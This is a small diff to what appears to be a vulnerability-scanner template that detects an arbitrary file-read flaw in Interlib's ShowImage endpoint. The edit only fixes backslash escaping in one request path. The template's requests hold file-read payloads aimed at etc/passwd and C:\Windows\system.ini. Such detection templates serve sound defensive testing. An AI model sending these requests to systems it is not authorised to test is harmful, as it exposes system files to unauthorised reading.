--- a/vulnerabilities/other/interlib-fileread.yaml
+++ b/vulnerabilities/other/interlib-fileread.yaml
@@ -11,7 +11,7 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/interlib/report/ShowImage?localPath=etc/passwd"
-      - "{{BaseURL}}/interlib/report/ShowImage?localPath=C:\Windows\system.ini"
+      - "{{BaseURL}}/interlib/report/ShowImage?localPath=C:\\Windows\\system.ini"
 
     matchers-condition: and
     matchers:
